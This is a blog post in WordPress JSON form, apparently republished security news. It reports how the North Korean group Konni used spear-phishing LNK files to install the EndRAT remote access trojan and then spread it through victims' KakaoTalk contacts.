{"id":290,"date":"2026-03-17T10:48:46","date_gmt":"2026-03-17T10:48:46","guid":{"rendered":"https:\/\/thedigitalfortress.us\/?p=290"},"modified":"2026-03-17T10:48:46","modified_gmt":"2026-03-17T10:48:46","slug":"konni-deploys-endrat-through-phishing-uses-kakaotalk-to-propagate-malware","status":"publish","type":"post","link":"https:\/\/thedigitalfortress.us\/?p=290","title":{"rendered":"Konni Deploys EndRAT Through Phishing, Uses KakaoTalk to Propagate Malware"},"content":{"rendered":"<div>\n<p><span class=\"p-author\"><i class=\"icon-font icon-user\">\ue804<\/i><span class=\"author\">Ravie Lakshmanan<\/span><i class=\"icon-font icon-calendar\">\ue802<\/i><span class=\"author\">Mar 17, 2026<\/span><\/span><span class=\"p-tags\">Threat Intelligence \/ Endpoint Security<\/span><\/p>\n<\/div>\n<div id=\"articlebody\">\n<div class=\"separator\" style=\"clear: both;\"><a href=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEh64jRKLqi9-c5fwxRIgUOuYe8fcW2NWoeEfMBoi9oBOrVRu1CW6TXPBuAL3VPIKoQMX4EeeKtPt0wzGFExXyCm3rGmXRYzfWsFSp1JDpxZ82neNjqGELR9s2ViKaVzhk2taHFfQNGiIYC9JyhaOd8c4DLKmUZt_SleyWwtCwi2ffFpFI6SIFq3h7pni3NZ\/s1700-e365\/attack-talk.jpg\" style=\"display: block;  text-align: center; clear: left; float: left;\"><\/a><\/div>\n<p>North Korean threat actors have been observed sending phishing to compromise targets and obtain access to a victim&#8217;s KakaoTalk desktop application to distribute malicious payloads to certain contacts.<\/p>\n<p>The activity has been attributed by South Korean threat intelligence firm Genians to a hacking group referred to as <strong>Konni<\/strong>.<\/p>\n<p>\u00abInitial access was achieved through a spear-phishing email disguised as a notice appointing the recipient as a North Korean human rights lecturer,\u00bb the Genians Security Center (GSC) <a href=\"https:\/\/www.genians.co.kr\/en\/blog\/threat_intelligence\/kakaotalk\" rel=\"noopener\" target=\"_blank\">noted<\/a> in an analysis.<\/p>\n<p>\u00abAfter the spear-phishing attack succeeded, the victim executed a malicious LNK file, resulting in infection with remote access malware. The malware remained concealed and persistent on the victim&#8217;s endpoint for an extended period, stealing internal documents and sensitive information.\u00bb<\/p>\n<div class=\"dog_two clear\">\n<div class=\"cf\"><a href=\"https:\/\/thehackernews.uk\/not-fast-enough-d\" rel=\"nofollow noopener sponsored\" target=\"_blank\"><img loading=\"lazy\" decoding=\"async\" class=\"lazyload\" alt=\"Cybersecurity\" src=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhlXM830ruQd2xT6M7JNeNRjaFa1onD12WjSCHihTFMTzbyfT9h-irPmXy_h3E1HGSs6sdv7FTmnyNVTM5kmSb7BuUtZe8gKoTQt99P1sSzRcqqXpOJP6eoAOhR3DGb6qHx9kOZ_HBZUMmVnsnd0DM7QfUp81bgzTvvgLww6oqB-EhnDfWXH5pWCYhAsyLs\/s728-e100\/tl-d.jpg\" width=\"729\" height=\"91\"\/><\/a><\/div>\n<\/div>\n<p>The threat actor is said to have remained on the compromised host for an extended period of time, leveraging the unauthorized access to siphon internal documents and make use of the KakaoTalk application to selectively propagate the malware to specific contacts.<\/p>\n<p>The attack is notable for abusing the trust associated with compromised victims to deceive and ensnare additional targets. This is not the first time Konni has employed the messaging app as a distribution vector. In November 2025, the hacking group was found abusing signed-in KakaoTalk chat app sessions to send malicious payloads to victims&#8217; contacts in the form of a ZIP archive, while simultaneously initiating a remote wipe of their Android devices using stolen Google credentials.<\/p>\n<p>The starting point of the latest attack campaign is a spear-phishing email that&#8217;s used as a ploy to trick recipients into opening a ZIP file attachment containing a Windows shortcut (LNK). Upon execution, the LNK file downloads a next-stage payload from an external server, establishes persistence using scheduled tasks, and ultimately executes the malware, while displaying a PDF decoy document to the user as a distraction mechanism.<\/p>\n<div class=\"separator\" style=\"clear: both;\"><a href=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEizSz_vG8_JCb7Kt-rAfMBoMX5tRaBCczP7Ug5ohhEshA7U674oefV8wl5g3KTqzCyycPzPobyGuadPpSeSle64xU3OrWjb9aBZDliD8hIkcVFByTonYke54eaHDiSE-3h8zwPfIXQ41kmmisCZP666m5uVRm6psjNb7L2gvM8ictycgc2KR4OWmK_qa9EO\/s1700-e365\/talk.png\" style=\"display: block;  text-align: center; clear: left; float: left;\"><img decoding=\"async\" src=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEizSz_vG8_JCb7Kt-rAfMBoMX5tRaBCczP7Ug5ohhEshA7U674oefV8wl5g3KTqzCyycPzPobyGuadPpSeSle64xU3OrWjb9aBZDliD8hIkcVFByTonYke54eaHDiSE-3h8zwPfIXQ41kmmisCZP666m5uVRm6psjNb7L2gvM8ictycgc2KR4OWmK_qa9EO\/s1700-e365\/talk.png\" alt=\"\" border=\"0\" data-original-height=\"1555\" data-original-width=\"2773\"\/><\/a><\/div>\n<p>Written in AutoIt, the downloaded malware is a remote access trojan (RAT) named EndRAT (aka EndClient RAT), which allows the operator to remotely commandeer the compromised host through capabilities like file management, remote shell access, data transfer, and persistence.<\/p>\n<p>Further analysis of the infected host has uncovered the presence of various malicious artifacts, including AutoIt scripts corresponding to RftRAT and RemcosRAT, indicating that the adversary deemed the victim as valuable enough to drop multiple RAT families for improved resilience.<\/p>\n<div class=\"dog_two clear\">\n<div class=\"cf\"><a href=\"https:\/\/thehackernews.uk\/cyber-comm-guide-d\" rel=\"nofollow noopener sponsored\" target=\"_blank\"><img loading=\"lazy\" decoding=\"async\" class=\"lazyload\" alt=\"Cybersecurity\" src=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEigDbfWwE4P_DsjfBRxgecgosqTRr8-2j328LrzdUBWrWmWeDUTI7OhXc-zXveYOjBc7GStGz5WnpXsJGaLCuoryIXbL7NxRyaWzIJGO1TBpd48NkYzNqTMj9zWMzgfvqh20RxsdMll45TFiMzXja0pAd7roFjMnzsRYBGHOWSLnyKN-oMKyCLoYcjmb5hm\/s728-e100\/ciso-d.jpg\" width=\"729\" height=\"91\"\/><\/a><\/div>\n<\/div>\n<p>An important aspect of the attack is the threat actor&#8217;s abuse of the victim&#8217;s KakaoTalk application installed on the infected system to distribute malicious files in the form of ZIP files to other individuals in their contact list and deploy the same malware. This essentially turns existing victims into intermediaries for further attacks.<\/p>\n<p>\u00abThis campaign is assessed as a multi-stage attack operation that extends beyond simple spear-phishing, combining long-term persistence, information theft, and account-based redistribution,\u00bb Genians said. \u00abThe actor selected certain contacts from the victim\u2019s friend list and sent them additional malicious files. In doing so, the attacker used filenames disguised as materials introducing North Korea-related content to induce recipients to open the files.\u00bb<\/p>\n<\/div>\n","protected":false},"excerpt":{"rendered":"<p>\ue804Ravie Lakshmanan\ue802Mar 17, 2026Threat Intelligence \/ Endpoint Security North Korean threat actors have been observed sending phishing to compromise targets and obtain access to a victim&#8217;s KakaoTalk desktop application to&hellip;<\/p>\n","protected":false},"author":1,"featured_media":291,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[297,707,708,706,42,390,709],"class_list":["post-290","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-uncategorized","tag-deploys","tag-endrat","tag-kakaotalk","tag-konni","tag-malware","tag-phishing","tag-propagate"],"_links":{"self":[{"href":"https:\/\/thedigitalfortress.us\/index.php?rest_route=\/wp\/v2\/posts\/290","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/thedigitalfortress.us\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/thedigitalfortress.us\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/thedigitalfortress.us\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/thedigitalfortress.us\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=290"}],"version-history":[{"count":0,"href":"https:\/\/thedigitalfortress.us\/index.php?rest_route=\/wp\/v2\/posts\/290\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/thedigitalfortress.us\/index.php?rest_route=\/wp\/v2\/media\/291"}],"wp:attachment":[{"href":"https:\/\/thedigitalfortress.us\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=290"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/thedigitalfortress.us\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=290"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/thedigitalfortress.us\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=290"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}